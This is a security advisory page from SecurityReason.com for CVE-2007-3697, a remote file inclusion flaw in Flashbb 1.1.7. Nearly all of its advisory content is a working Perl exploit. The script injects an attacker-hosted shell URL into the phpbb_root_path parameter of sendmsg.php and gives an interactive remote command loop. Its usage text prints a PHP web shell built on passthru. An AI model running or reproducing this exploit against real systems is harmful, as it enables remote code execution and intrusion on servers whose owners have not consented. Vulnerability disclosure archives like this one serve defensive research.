SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

Flashbb <= 1.1.7 - Remote File Inclusion Exploit


Arrow  SecurityAlert : 2881
Arrow  CVE : CVE-2007-3697
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Exploit Available : Yes
Arrow  Credit : kw3rln
Arrow  Published : 16.07.2007

Arrow  Affected Software : Flashbb <= 1.1.7



Arrow  Advisory Content :  

#!/usr/bin/perl
#
# Flashbb <= 1.1.7 - Remote File Inclusion Exploit
#
# Url: http://rapidshare.com/files/41426468/FlashBB_AaeDueHFcu.zip
#
# Exploit:
# http://site.com/[path]/phpbb/sendmsg.php?phpbb_root_path=[Evil_Script>:]

#
# (c)oded and f0und3d by kw3rln <office[at]rosecuritygroup[dot]net>
#
# Romanian Security Team .: hTTp://RSTZONE.NET :.
#
#
#
# greetz to all RST [rstzone.net] MEMBERZ

use LWP::Simple;

print "...........................[RST]...............................n";
print ". .n";
print ". Flashbb <= 1.1.7 - Remote File Inclusion Exploit .n";
print ". .n";
print "...............................................................n";
print ". Romanian Security Team -> hTTp://RSTZONE.NET .n";
print ". [c]oded by Kw3rLN - office (at) rosecuritygroup (dot) net
[email concealed] .n";
print "...............................................................nn";

my $kw3,$path,$shell,$conexiune,$cmd,$data ;

if ((!$ARGV[0]) || (!$ARGV[1])) { &usage;exit(0);}

$path = $ARGV[0];
chomp($path);
$shell = $ARGV[1];
chomp($shell);

$path = $path."/phpbb/sendmsg.php";

sub usage(){
print "Usage : perl $0 host/path http://site.com/cmd.txtnn";
print "Example : perl $0 http://127.0.0.1
http://site.com/cmd.txtnn";
print 'Shell : <?php
ob_clean();ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>
';
}

while ()
{
print "[kw3rln].[rst] :~$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit") { exit(0);}

$kw3 = $path."?phpbb_root_path=".$shell."?&cmd=".$cmd;
if ($cmd eq "")
{ print "Enter your command !n"; }
else
{ $data=get($kw3); print $data ; }
}





Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libopie __readrec() off-by-one

Security Risk Medium- 2010-04-23

This advisory is related to new FreeBSD advisory FreeBSD-SA-10:05.opie.

Apache RSS Apache Alert

» Apache ActiveMQ 5.4.0
   source code disclosure
   vulnerability

» Apache ActiveMQ 5.3.0
   Persistent Cross-Site
   Scripting

» Apache CouchDB 0.10.1
   Timing Attack
   Vulnerability

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.